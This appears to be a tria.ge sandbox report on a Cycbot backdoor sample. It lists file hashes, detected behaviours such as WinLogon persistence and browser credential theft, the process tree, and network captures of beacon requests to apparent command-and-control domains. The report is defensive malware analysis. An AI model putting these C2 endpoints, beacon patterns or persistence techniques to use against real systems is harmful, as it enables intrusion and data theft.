Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

e3b819b822...18.exe

windows7-x64

10

e3b819b822...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11/12/2024, 23:42 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe

  • Size

    168KB

  • MD5

    e3b819b82243a8eb75673a9bb77a2aaa

  • SHA1

    b62167d96bdb6437ec3fec596d95f5c7ce91b731

  • SHA256

    9d0eebe40aeedb7a33d6c93e1370a4b3a0d2c1ff7868b33f87672f4248f2d0c3

  • SHA512

    c4f2b5e467205406a0a4fb35f346152ea11972a2ade8f793b47a4e07600775fc6e80804b384d08354ee4cccd14c8cf41d0f639e241beab8ae96006b490592372

  • SSDEEP

    3072:3w0kxfJr+HMTthTtsOkmeD0wVoCin2c2mRO0edWnecPEH/dpQji+:ExV+sT6keD7obLFne+4H/8jN

Score
10/10
cycbotbackdoordiscoverypersistenceratspywarestealerupx

Malware Config

Signatures

  • Cycbot

    Cycbot is a backdoor and trojan written in C++..

    backdoorratcycbot
  • Cycbot family
    cycbot
  • Detects Cycbot payload 7 IoCs

    Cycbot is a backdoor and trojan written in C++.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe"
    1⤵
    • Modifies WinLogon for persistence
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
      C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe startC:\Program Files (x86)\LP\2C08\619.exe%C:\Program Files (x86)\LP\2C08
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2780
    • C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
      C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe startC:\Program Files (x86)\F6D9E\lvvm.exe%C:\Program Files (x86)\F6D9E
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2160

Network

  • flag-us
    DNS
    browsermmorpg.com
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    browsermmorpg.com
    IN A
    Response
    browsermmorpg.com
    IN A
    172.66.40.218
    browsermmorpg.com
    IN A
    172.66.43.38
  • flag-us
    GET
    http://browsermmorpg.com/img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    172.66.40.218:80
    Request
    GET /img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0
    Connection: close
    Host: browsermmorpg.com
    Accept: */*
    User-Agent: chrome/9.0
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 12 Dec 2024 12:45:57 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: close
    Cache-Control: max-age=3600
    Expires: Thu, 12 Dec 2024 13:45:57 GMT
    Location: https://browsermmorpg.com/img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KEbEVtZy7lSgUnv0Z4kTvXoANOkwX6DVGTfIOR%2F6inQmG%2BMQo%2FQEhuJRk3r2eWWDQblVJxgsM13MdOD5mD621mGHek6qVd1T1rXLwLooqXIyS79Alpx1XPgQWVGGAg6Q2TVzSA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f0dd084bf417792-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=26128&min_rtt=26128&rtt_var=13064&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=158&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • flag-us
    DNS
    webhomefordomains.com
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    webhomefordomains.com
    IN A
    Response
  • flag-us
    DNS
    ourthreedomains.com
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    ourthreedomains.com
    IN A
    Response
  • flag-us
    DNS
    www.google.com
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    www.google.com
    IN A
    Response
    www.google.com
    IN A
    172.217.20.164
  • flag-fr
    GET
    http://www.google.com/
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    172.217.20.164:80
    Request
    GET / HTTP/1.0
    Connection: close
    Host: www.google.com
    Accept: */*
    Response
    HTTP/1.0 302 Found
    Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMG267oGIjBRMDaJnXn7YIe4OexjXXCRY4tW-BpbjZMY0AIGTZVQWWJxUxlOApdscxO3H6UEF_QyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgwIwrbrugYQuaCNggESBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-_sQg24OtM2YtKCo-hpcs5g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Thu, 12 Dec 2024 12:46:58 GMT
    Server: gws
    Content-Length: 396
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-WyUliopSVXMcxDE9hYAhgDkFE90ACkaAM2gtCYIu5cPmTqfh5YSzA; expires=Tue, 10-Jun-2025 12:46:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
  • flag-fr
    GET
    http://www.google.com/
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    172.217.20.164:80
    Request
    GET / HTTP/1.1
    Connection: close
    Pragma: no-cache
    Host: www.google.com
    Response
    HTTP/1.1 302 Found
    Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMK267oGIjAX13aSYGNauAQe--hSXTuOjvZ7r5x1dz1BEbRN-y4ogSTQBApNwBSvhjX8HYowvGwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgwIwrbrugYQ_uOdhQMSBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-BZrbOST1OoOxXE7choE89w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Thu, 12 Dec 2024 12:46:58 GMT
    Server: gws
    Content-Length: 396
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-UXAlg24NUv7rUGmkm3MnGY9quStrZeRPlGmNoAGOKe9NTQSxPRtg; expires=Tue, 10-Jun-2025 12:46:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
    Connection: close
  • flag-fr
    GET
    http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMK267oGIjAX13aSYGNauAQe--hSXTuOjvZ7r5x1dz1BEbRN-y4ogSTQBApNwBSvhjX8HYowvGwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    172.217.20.164:80
    Request
    GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGMK267oGIjAX13aSYGNauAQe--hSXTuOjvZ7r5x1dz1BEbRN-y4ogSTQBApNwBSvhjX8HYowvGwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
    Connection: close
    Pragma: no-cache
    Host: www.google.com
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Thu, 12 Dec 2024 12:46:58 GMT
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Content-Type: text/html
    Server: HTTP server (unknown)
    Content-Length: 3075
    X-XSS-Protection: 0
    Connection: close
  • 172.66.40.218:80
    http://browsermmorpg.com/img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D
    http
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    388 B
     1.3kB
     5
    5

    HTTP Request

    GET http://browsermmorpg.com/img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D

    HTTP Response

    301
  • 172.217.20.164:80
    http://www.google.com/
    http
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    302 B
     1.5kB
     5
    5

    HTTP Request

    GET http://www.google.com/

    HTTP Response

    302
  • 172.217.20.164:80
    http://www.google.com/
    http
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    307 B
     1.5kB
     5
    5

    HTTP Request

    GET http://www.google.com/

    HTTP Response

    302
  • 172.217.20.164:80
    http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMK267oGIjAX13aSYGNauAQe--hSXTuOjvZ7r5x1dz1BEbRN-y4ogSTQBApNwBSvhjX8HYowvGwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    http
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    526 B
     3.7kB
     6
    7

    HTTP Request

    GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMK267oGIjAX13aSYGNauAQe--hSXTuOjvZ7r5x1dz1BEbRN-y4ogSTQBApNwBSvhjX8HYowvGwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

    HTTP Response

    429
  • 127.0.0.1:61030
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
  • 127.0.0.1:61030
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
  • 8.8.8.8:53
    browsermmorpg.com
    dns
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    63 B
     95 B
     1
    1

    DNS Request

    browsermmorpg.com

    DNS Response

    172.66.40.218
    172.66.43.38

  • 8.8.8.8:53
    webhomefordomains.com
    dns
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    67 B
     140 B
     1
    1

    DNS Request

    webhomefordomains.com

  • 8.8.8.8:53
    ourthreedomains.com
    dns
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    65 B
     138 B
     1
    1

    DNS Request

    ourthreedomains.com

  • 8.8.8.8:53
    www.google.com
    dns
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    60 B
     76 B
     1
    1

    DNS Request

    www.google.com

    DNS Response

    172.217.20.164

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\818F6\6D9E.18F
    Filesize

    1KB

    MD5

    3643660ea67a8ae07cf199ea5fcb5991

    SHA1

    a4e95f7874653c887785275886301f224a689357

    SHA256

    a0b1d1aeaacc2051f8c1e3de4a8bf81e7a407988f972928481b8b24bd94d6a7b

    SHA512

    706f77c167dcd406a04a782da0abb3d9d1fc0c826b4cd4de8dc2581eed63975002cd1f1833665899f3dc5e285c5397dc6cb244c09c34fa47d359b47b2b7d56a2

    Download Submit

  • C:\Users\Admin\AppData\Roaming\818F6\6D9E.18F
    Filesize

    600B

    MD5

    b309ffe47dd91194016bf75b4ea9fa9d

    SHA1

    bc792c3d9cd985b8fa16298a31ed7dd7e11f32be

    SHA256

    08da11f91acb095c9149272dd41053642bca2965534d864b6c67105e608ccc70

    SHA512

    b605edc88ccf83a3d498fee9aff3b03fd66de9a441f93f4e13b1f607678f67863e56aa8aff0623745d0ce4c46e2b523eea35092a927a180335a522113178ace6

    Download Submit

  • C:\Users\Admin\AppData\Roaming\818F6\6D9E.18F
    Filesize

    996B

    MD5

    2ff734db2d3930a5fe2ae317832bf504

    SHA1

    484d218e567ef13f461580ed9ecffe25a53a1414

    SHA256

    13c53f68727a78e7309dd65d9076d42af4a98af0fbb5439df4142197d5103b79

    SHA512

    1d7def9db7e0c4fbaf8401fd5db8fdb6e08187158cfdc60d06343a683c78bd3624e25662c4941ea96a1c903af3f5809049f041b6d02464f7cc92678b21edc555

    Download Submit

  • memory/2160-77-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

    Download

  • memory/2160-79-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

    Download

  • memory/2160-78-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

    Download

  • memory/2684-16-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

    Download

  • memory/2684-1-0x0000000000400000-0x000000000048D000-memory.dmp

    Filesize

    564KB

    Download

  • memory/2684-75-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

    Download

  • memory/2684-15-0x0000000000400000-0x000000000048D000-memory.dmp

    Filesize

    564KB

    Download

  • memory/2684-2-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

    Download

  • memory/2684-182-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

    Download

  • memory/2780-12-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

    Download

  • memory/2780-14-0x0000000002160000-0x00000000021DB000-memory.dmp

    Filesize

    492KB

    Download

  • memory/2780-13-0x0000000000400000-0x000000000048D000-memory.dmp

    Filesize

    564KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.